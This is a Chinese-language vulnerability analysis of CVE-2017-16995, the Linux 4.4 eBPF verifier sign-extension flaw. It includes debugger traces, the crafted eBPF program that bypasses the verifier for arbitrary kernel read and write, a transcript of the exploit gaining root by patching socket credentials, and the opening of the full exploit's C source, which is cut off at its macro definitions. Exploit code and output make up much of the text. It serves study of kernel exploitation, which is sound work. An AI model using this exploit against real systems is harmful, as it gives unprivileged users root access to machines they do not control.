前言
关于这个漏洞网上已经有很多相关原理的分析,但大多主要以Vitaly Nikolenko的exp来分析,其中涉及了对exp中ebpf字节码进行逆向的问题,对于分析漏洞利用过程并不是十分直观。本篇文章以Bruce Leidl的exp进行分析,个人认为相比前者流程更加清晰直观,便于理解。
环境搭建
本次复现使用Linux_kernel-4.4.33,在编译前开启CONFIG_BPF 和CONFIG_DEBUG_INFO。
extended BPF
eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,tracfic control,应用性能监控等强大功能。eBPF提供了一套类似RISC指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。
eBPF虚拟指令系统属于RISC,拥有10个虚拟寄存器,r0-r10,在实际运行时,虚拟机会把这10个寄存器一 一对应于硬件CPU的10个物理寄存器,以x64为例,对应关系如下:
//R0 - 保存返回值
//R1-R5 参数传递
//R6-R9 保存临时变量
//R10 只读,用做栈指针
R0 – rax
R1 - rdi
R2 - rsi
R3 - rdx
R4 - rcx
R5 - r8
R6 - rbx
R7 - r13
R8 - r14
R9 - r15
R10 – rbp(帧指针,frame pointer)
每一条指令的格式如下:
//source/include/uapi/linux/bpf.h#L58
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* dest register */
__u8 src_reg:4; /* source register */
__s16 off; /* signed offset */
__s32 imm; /* signed immediate constant */
};
例如BPF指令:BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)
其数据结构为:
//source/include/linux/filter.h#L124
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
转换成字节码为:\xb4\x09\x00\x00\xff\xff\xff\xff
。
可通过如下程序对eBPF字节码进行转换:
[1]https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c
[2]https://github.com/ret2p4nda/kernel-pwn/blob/master/CVE-2017-16995/epbf_tools.py
漏洞分析
简单来说漏洞点是在BPF模拟执行检测时的代码实现和实际运行时的代码实现不同,导致了经过构造的BPF指令绕过检测从而执行恶意代码。
verifier机制绕过
eBPF检测时(do_check() )
我们首先来看如何绕过eBPF的verifier机制,exp中代码如下:
#define BPF_DISABLE_VERIFIER() \
BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
BPF_EXIT_INSN() /* } */ \
第一行的eBPF操作码为BPF_ALU | BPF_MOV | BPF_K
,verifier 会对ALU指令用check_alu_op
函数进行检查。
该函数调用路径为:
#0 0xffffffff8116719b in check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1097
#1 do_check (env=<optimized out>) at kernel/bpf/verifier.c:1765
#2 bpf_check (prog=<optimized out>, attr=<optimized out>) at kernel/bpf/verifier.c:2258
#3 0xffffffff81163d4e in bpf_prog_load (attr=0xffff88000d94fef0) at kernel/bpf/syscall.c:679
#4 0xffffffff8116456e in SYSC_bpf (size=48, uattr=<optimized out>, cmd=<optimized out>) at kernel/bpf/syscall.c:783
#5 SyS_bpf (cmd=5, uattr=140726845938864, size=72) at kernel/bpf/syscall.c:725
#6 0xffffffff817ef672 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:185
该函数最后一个else
是将立即数赋值给寄存器,然而其并没有对BPF_ALU64|BPF_MOV|BPF_K
和BPF_ALU|BPF_MOV|BPF_K
两个指令做区分。直接把用户指令中的立即数insn->imm
赋值给了目的寄存器,insn->imm
和目的寄存器的类型都是int。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
RAX 0x90
RBX 0xffff88000d950018 ◂— 0
RCX 0x0
RDX 0xffffffff
RDI 0xffff88000d950018 ◂— 0
RSI 0xffff88000d9500a8 ◂— 8
R8 0xa
R9 0xfffc
R10 0xb
R11 0xffffc9000009301b ◂— 0xa /* '\n' */
R12 0x0
R13 0xffffc90000002028 ◂— 0xffffffff000009b4
R14 0xb0
R15 0xffff88000d950000 —▸ 0xffffc90000002000 ◂— 0x2900020001
RBP 0xffff88000d94fe18 —▸ 0xffff88000d94fed0 —▸ 0xffff88000d94ff48 —▸ 0x7ffd85a99d00 —▸ 0x7ffd85a99d10 ◂— ...
RSP 0xffff88000d94fd90 ◂— 0xffffffff
RIP 0xffffffff8116719b (bpf_check+6715) ◂— 0xca870ffffff237e9
──────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
0xffffffff81167187 <bpf_check+6695> movzx eax, byte ptr [r13 + 1]
0xffffffff8116718c <bpf_check+6700> mov edx, dword ptr [r13 + 4]
0xffffffff81167190 <bpf_check+6704> and eax, irq_stack_union+15 <15>
0xffffffff81167193 <bpf_check+6707> shl rax, 4 <4>
0xffffffff81167197 <bpf_check+6711> mov dword ptr [rbx + rax + 8], edx
► 0xffffffff8116719b <bpf_check+6715> jmp bpf_check+3191 <0xffffffff811663d7>
↓
0xffffffff811663d7 <bpf_check+3191> add r12d, 1
0xffffffff811663db <bpf_check+3195> jmp bpf_check+2633 <0xffffffff811661a9>
↓
0xffffffff811661a9 <bpf_check+2633> cmp dword ptr [rsp + 0x38], r12d
0xffffffff811661ae <bpf_check+2638> jle bpf_check+6091 <0xffffffff81166f2b>
0xffffffff811661b4 <bpf_check+2644> mov rax, qword ptr [rsp + 0x30]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/verifier.c
1091 }
1092 } else {
1093 /* case: R = imm
1094 * remember the value we stored into this reg
1095 */
1096 regs[insn->dst_reg].type = CONST_IMM;
► 1097 regs[insn->dst_reg].imm = insn->imm;
1098 }
1099
1100 } else if (opcode > BPF_END) {
1101 verbose("invalid BPF_ALU opcode %x\n", opcode);
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0xffff88000d94fd90 ◂— 0xffffffff
01:0008│ 0xffff88000d94fd98 ◂— jnp 0xffff88000d94fd3c /* 0xa27b */
02:0010│ 0xffff88000d94fda0 ◂— 0x95
03:0018│ 0xffff88000d94fda8 ◂— 0
04:0020│ 0xffff88000d94fdb0 ◂— add byte ptr [rax], al /* 0x800000000000 */
05:0028│ 0xffff88000d94fdb8 —▸ 0x6be540 ◂— 0
06:0030│ 0xffff88000d94fdc0 —▸ 0xffffc90000002028 ◂— 0xffffffff000009b4
07:0038│ 0xffff88000d94fdc8 —▸ 0xffff880000000029 ◂— xlatb /* 0x1ef000d71ef000d7 */
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
► f 0 ffffffff8116719b bpf_check+6715
f 1 ffffffff8116719b bpf_check+6715
f 2 ffffffff8116719b bpf_check+6715
f 3 ffffffff81163d4e bpf_prog_load+590
f 4 ffffffff8116456e sys_bpf+846
f 5 ffffffff8116456e sys_bpf+846
f 6 ffffffff817ef672 entry_SYSCALL_64+98
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/10wx $rbx+$rax
0xffff88000d9500a8: 0x00000008 0x00000000 0xffffffff 0x00000000
0xffff88000d9500b8: 0x00000006 0x00000000 0x00000000 0x00000000
0xffff88000d9500c8: 0x00000000 0x00000000
$rbx+$rax
是 reg_state
结构体类型的reg
值,可见第一个字段值为8,第二个字段值为0xffffffff。结构体定义如下:
//kernel/bpf/verifier.c
struct reg_state {
enum bpf_reg_type type;
union {
/* valid when type == CONST_IMM | PTR_TO_STACK */
int imm;
/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
};
};
//declaration of regs
struct reg_state *regs = state->regs
可以看到该结构体有2个字段,第一个为type,代表寄存器数据的类型,此处为CONST_IMM
,CONST_IMM
的值为8.另外一个为常量立即数的具体数值,可以看到类型为有符号整形。
do_check()
在校验条件类跳转指令的时候,会判断条件是否成立,如果是非确定性跳转的话,就说明接下来2个分支都有可能执行(分支1和分支2),这时do_check()
会把下一步需要跳转到的指令编号(分支2)放到一个临时栈中备用,这样当前指令顺序校验(分支1)过程中遇到EXIT
指令时,会从临时栈中取出之前保存的下一条指令的序号(分支2)继续校验。如果跳转指令恒成立的话(即直通分支, fall-through branch ),就不会再往临时栈中放入分支2,因为分支2永远不会执行。
下面这段代码是对BPF_JMP|BPF_JNE|BPF_IMM
指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(insn->imm
),程序继续执行,否则执行pc+off
处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论imm
是否有符号,在这里都是相等的。
//kernel/bpf/verifier.c#L1248
static int check_cond_jmp_op(struct verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct reg_state *regs = env->cur_state.regs;
struct verifier_state *other_branch;
u8 opcode = BPF_OP(insn->code);
int err;
...
/* detect if R == 0 where R was initialized to zero earlier */
if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE) &&
regs[insn->dst_reg].type == CONST_IMM &&
regs[insn->dst_reg].imm == insn->imm) {
if (opcode == BPF_JEQ) {
/* if (imm == imm) goto pc+off;
* only follow the goto, ignore fall-through
*/
*insn_idx += insn->off;
return 0;
} else {
/* if (imm != imm) goto pc+off;
* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
}
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
...
}
下面代码,是在校验EXIT
指令时,会从临时栈中尝试取指令(调用pop_stack()
函数),如果临时栈中有指令,那就说明还有其他可能执行到的分支,需要继续校验,如果取不到值,表示当前这条EXIT
指令确实是BPF程序最后一条可以执行到的指令,此时pop_stack()
会返回-1,然后跳出do_check
校验循环,do_check
执行结束,校验通过。
//kernel/bpf/verifier.c#L1921
else if (class == BPF_JMP) {
u8 opcode = BPF_OP(insn->code);
...
} else if (opcode == BPF_EXIT) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_EXIT uses reserved fields\n");
return -EINVAL;
}
/* eBPF calling convetion is such that R0 is used
* to return the value from eBPF program.
* Make sure that it's readable at this time
* of bpf_exit, which means that program wrote
* something into it earlier
*/
err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
if (err)
return err;
if (is_pointer_value(env, BPF_REG_0)) {
verbose("R0 leaks addr as return value\n");
return -EACCES;
}
process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}
}
...
}
eBPF运行时(_bpf_prog_run() )
运行第一行操作指令时,将操作码BPF_ALU | BPF_MOV | BPF_K
对应为ALU_MOV_K
。而64位的操作码BPF_ALU64|BPF_MOV|BPF_K
对应为ALU64_MOV_K
,定义代码如下:
//kernel/bpf/core.c
static const void *jumptable[256] = {
[0 ... 255] = &&default_label,
...
[BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K,
...
[BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K,
...
};
...
ALU_MOV_K:
DST = (u32) IMM;
CONT;
...
ALU64_MOV_K:
DST = IMM;
CONT;
可以看出verifier检测时和eBPF运行时代码对于2条指令的语义解释并不一样,DST
是64位寄存器,因此ALU_MOV_K
得到的是一个32位的无符号整数,而ALU64_MOV_K
会对imm
进行符号扩展,得到一个64位有符号整数。
eBPF运行时对BPF_JMP|BPF_JNE|BPF_K
指令的解释
JMP_JNE_K:
if (DST != IMM) {
insn += insn->off;
CONT_JMP;
}
CONT;
当imm
为有符号和无符号时,由于符号扩展,DST!=IMM
结果是不一样的。
动态调试结果如下,可见实际执行时与模拟执行时跳转结果相反,最终执行了verifier未检查的eBPF代码。从而绕过了verifier检测机制。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
RAX 0x9
RBX 0xffffc90000002030 ◂— 0xffffffff00020955
RCX 0x0
RDX 0xffffffffffffffff
RDI 0xffff88000d961300 ◂— 0
RSI 0xffffffff
R8 0x0
R9 0x0
R10 0x0
R11 0xffff88000d929000 ◂— 0
R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
R13 0x0
R14 0xffff88000d928c00 ◂— 0
R15 0xffff88000d94fdf0 ◂— 0
RBP 0xffff88000d94fce0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
RSP 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
RIP 0xffffffff81162d2c (__bpf_prog_run+2028) ◂— 0xfffffd90c5943948
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
0xffffffff811631d0 <__bpf_prog_run+3216> movzx eax, byte ptr [rbx]
0xffffffff811631d3 <__bpf_prog_run+3219> jmp qword ptr [r12 + rax*8]
↓
0xffffffff81162d21 <__bpf_prog_run+2017> movzx eax, byte ptr [rbx + 1]
0xffffffff81162d25 <__bpf_prog_run+2021> movsxd rdx, dword ptr [rbx + 4]
0xffffffff81162d29 <__bpf_prog_run+2025> and eax, irq_stack_union+15 <15>
► 0xffffffff81162d2c <__bpf_prog_run+2028> cmp qword ptr [rbp + rax*8 - 0x270], rdx
0xffffffff81162d34 <__bpf_prog_run+2036> je __bpf_prog_run+4992 <0xffffffff811638c0>
0xffffffff81162d3a <__bpf_prog_run+2042> movsx rax, word ptr [rbx + 2]
0xffffffff81162d3f <__bpf_prog_run+2047> lea rbx, [rbx + rax*8 + 8]
0xffffffff81162d44 <__bpf_prog_run+2052> movzx eax, byte ptr [rbx]
0xffffffff81162d47 <__bpf_prog_run+2055> jmp qword ptr [r12 + rax*8]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
491 insn += insn->off;
492 CONT_JMP;
493 }
494 CONT;
495 JMP_JNE_K:
► 496 if (DST != IMM) {
497 insn += insn->off;
498 CONT_JMP;
499 }
500 CONT;
501 JMP_JGT_X:
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
01:0008│ 0xffff88000d94fa70 ◂— 0
02:0010│ 0xffff88000d94fa78 —▸ 0xffff88000d961300 ◂— 0
03:0018│ 0xffff88000d94fa80 ◂— 0
04:0020│ 0xffff88000d94fa88 —▸ 0xffff88000fd5c8d8 ◂— 0xffff88000fd5c8d8
05:0028│ 0xffff88000d94fa90 —▸ 0xffff88000fa1a208 —▸ 0xffffea000006f460 —▸ 0xffffea000006f420 —▸ 0xffffea000006f3e0 ◂— ...
06:0030│ 0xffff88000d94fa98 —▸ 0xffff88000fd5c780 ◂— 0x1c4
07:0038│ 0xffff88000d94faa0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
► f 0 ffffffff81162d2c __bpf_prog_run+2028
f 1 ffffffff81700a1b sk_filter+91
f 2 ffffffff81700a1b sk_filter+91
f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
f 4 ffffffff816cec48 sock_sendmsg+56
f 5 ffffffff816cec48 sock_sendmsg+56
f 6 ffffffff816cece2 sock_write_iter+130
f 7 ffffffff811f7f09 __vfs_write+169
f 8 ffffffff811f7f09 __vfs_write+169
f 9 ffffffff811f8556 vfs_write+150
f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp+$rax*8-0x270
0xffff88000d94fab8: 0xffffffff
pwndbg> i r $rdx
rdx 0xffffffffffffffff -1
组装eBPF指令
在绕过verifier检测机制后,需要组装一个eBPF指令用来做任意地址的读写。
首先来看exp中的实现,如下:
#define BPF_DISABLE_VERIFIER() \
BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
BPF_EXIT_INSN() /* } */ \
#define BPF_MAP_GET(idx, dst) \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \
BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \
BPF_EXIT_INSN(), /* exit(0); */ \
BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */
static int load_prog() {
struct bpf_insn prog[] = {
BPF_DISABLE_VERIFIER(),
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */
BPF_LD_MAP_FD(BPF_REG_9, mapfd), /* r9 = mapfd */
//可以看出这个MAP的第一个元素为操作指令,第二个元素为需要读写的内存地址,第三个元素用来存放读取到的内容。
BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */
BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */
BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */
/* store map slot address in r2 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */
/* get fp */
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */
/* get skbuff */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */
/* read */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
/* else */
/* write */
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}
之前已经分析过BPF_DISABLE_VERIFIER()
的行为,继续往下分析。
首先将rax
存入rbp - 0x220
处,此处为exp中fp
的值。将rdi
存入rbp-0x268
处,此处为exp中BPF_REG_1
的值,并且rdi
在源码中的定义为struct sk_buff * skb
,这为后面覆写skb->sk->sk_peer_cred
提权做铺垫。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
RAX 0xb4
RBX 0xffffc90000002028 ◂— 0xffffffff000002b4
RCX 0x0
RDX 0xffff88000d9fc800 ◂— 0
RDI 0xffff88000da0e800 ◂— 0
RSI 0xffffc90000002028 ◂— 0xffffffff000002b4
R8 0x0
R9 0x0
R10 0x0
R11 0xffff88000d9fc800 ◂— 0
R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
R13 0x0
R14 0xffff88000d9fc400 ◂— 0
R15 0xffff88000da0bdf0 ◂— 0
RBP 0xffff88000da0bce0 —▸ 0xffff88000da0bd20 —▸ 0xffff88000da0bdc0 —▸ 0xffff88000da0bde0 —▸ 0xffff88000da0be50 ◂— ...
RSP 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
RIP 0xffffffff81162577 (__bpf_prog_run+55) ◂— 0xfffffd9085c748
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
0xffffffff8116255c <__bpf_prog_run+28> xor r13d, r13d
0xffffffff8116255f <__bpf_prog_run+31> sub rsp, irq_stack_union+608 <0x260>
0xffffffff81162566 <__bpf_prog_run+38> mov qword ptr [rbp - 0x220], rax
0xffffffff8116256d <__bpf_prog_run+45> movzx eax, byte ptr [rsi]
0xffffffff81162570 <__bpf_prog_run+48> mov qword ptr [rbp - 0x268], rdi
► 0xffffffff81162577 <__bpf_prog_run+55> mov qword ptr [rbp - 0x270], 0
0xffffffff81162582 <__bpf_prog_run+66> mov qword ptr [rbp - 0x238], 0
0xffffffff8116258d <__bpf_prog_run+77> jmp qword ptr [r12 + rax*8]
↓
0xffffffff811631ba <__bpf_prog_run+3194> movzx eax, byte ptr [rbx + 1]
0xffffffff811631be <__bpf_prog_run+3198> mov esi, dword ptr [rbx + 4]
0xffffffff811631c1 <__bpf_prog_run+3201> add rbx, 8 <8>
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
305
306 FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
307 ARG1 = (u64) (unsigned long) ctx;
308
309 /* Registers used in classic BPF programs need to be reset first. */
► 310 regs[BPF_REG_A] = 0;
311 regs[BPF_REG_X] = 0;
312
313 select_insn:
314 goto *jumptable[insn->code];
315
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
01:0008│ 0xffff88000da0ba70 ◂— 0
02:0010│ 0xffff88000da0ba78 —▸ 0xffff88000da0e800 ◂— 0
03:0018│ 0xffff88000da0ba80 —▸ 0xffff88000d96c770 ◂— 0
04:0020│ 0xffff88000da0ba88 —▸ 0xffff88000da0e800 ◂— 0
05:0028│ 0xffff88000da0ba90 ◂— 0x158
06:0030│ 0xffff88000da0ba98 —▸ 0xffff88000fd07e00 —▸ 0xffff88000fd06780 ◂— 0x1c4
07:0038│ 0xffff88000da0baa0 ◂— 1
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
► f 0 ffffffff81162577 __bpf_prog_run+55
f 1 ffffffff81700a1b sk_filter+91
f 2 ffffffff81700a1b sk_filter+91
f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
f 4 ffffffff816cec48 sock_sendmsg+56
f 5 ffffffff816cec48 sock_sendmsg+56
f 6 ffffffff816cece2 sock_write_iter+130
f 7 ffffffff811f7f09 __vfs_write+169
f 8 ffffffff811f7f09 __vfs_write+169
f 9 ffffffff811f8556 vfs_write+150
f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/gx $rbp-0x220
0xffff88000da0bac0: 0xffff88000da0bcc8
pwndbg> x/gx 0xffff88000da0bcc8
0xffff88000da0bcc8: 0xffff88000da0e800
pwndbg> x/gx $rbp-0x268
0xffff88000da0ba78: 0xffff88000da0e800
BPF_MAP_GET
的主要流程为:将mapfd
放到r9
;将r9
放到r1
,作为后续调用BPF_FUNC_map_lookup_elem
函数的第一个参数;将fp
赋值给r2
;在栈上开辟4个字节的空间;将MAP元素的序号(idx
)放到r2
;取map中第r2个元素的值调用BPF_FUNC_map_lookup_elem
并把返回值存入r0;判断BPF_FUNC_map_lookup_elem
是否执行成功;成功后执行第9条指令,将取到的值放到目标寄存器(dst
)中。
后面定义了四个命令:1.获取fp
内核栈地址。2.获取sk_buff
地址。3.任意地址读。4.任意地址写。
提权
覆写sk
中的sk_peer_cred
使其内部与uid相关值置0。由于每个内核版本sk_peer_cred
偏移不同,可以先搜索sk_rcvtimeo = 9223372036854775807
找到其偏移再减8即为sk_peer_cred
的偏移。
pwndbg> p *((struct sk_buff *)0xffff88000da0e800)
$1 = {
{
{
next = 0x0 <irq_stack_union>,
prev = 0x0 <irq_stack_union>,
{
tstamp = {
tv64 = 0
},
skb_mstamp = {
{
v64 = 0,
{
stamp_us = 0,
stamp_jiffies = 0
}
}
}
}
},
rbnode = {
__rb_parent_color = 0,
rb_right = 0x0 <irq_stack_union>,
rb_left = 0x0 <irq_stack_union>
}
},
sk = 0xffff88000d9fc400,
...
}
pwndbg> p *((struct sock*)0xffff88000d9fc400)
$2 = {
...
sk_peer_pid = 0xffff88000d96cd00,
sk_peer_cred = 0xffff88000d9f9c00,
sk_rcvtimeo = 9223372036854775807,
sk_sndtimeo = 9223372036854775807,
...
}
运行结果:
/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ ./get-rekt-linux-hardened
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
uid:3e8
[*] Leaking skbuff addr from ffff88000d9f9400
[*] Leaking sock struct from ffff88000da16400
[*] found sock->sk_rcvtimeo at offset 472
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff88000da10780
[*] credentials patched, launching shell...
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)
EXP
完整exp如下:
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>
char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;
#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];
static __u64 ptr_to_u64(void *ptr)
{
return (__u64) (unsigned long) ptr;
}
int bpf_prog_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version)
{
union bpf_attr attr = {
.prog_type = prog_type,
.insns = ptr_to_u64((void *) insns),
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = ptr_to_u64((void *) license),
.log_buf = ptr_to_u64(bpf_log_buf),
.log_size = LOG_BUF_SIZE,
.log_level = 1,
};
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
int max_entries, int map_flags)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries
};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
union bpf_attr attr = {
.map_fd = fd,
.key = ptr_to_u64(key),
.value = ptr_to_u64(value),
.flags = flags,
};
return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
int bpf_lookup_elem(int fd, void *key, void *value)
{
union bpf_attr attr = {
.map_fd = fd,
.key = ptr_to_u64(key),
.value = ptr_to_u64(value),
};
return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
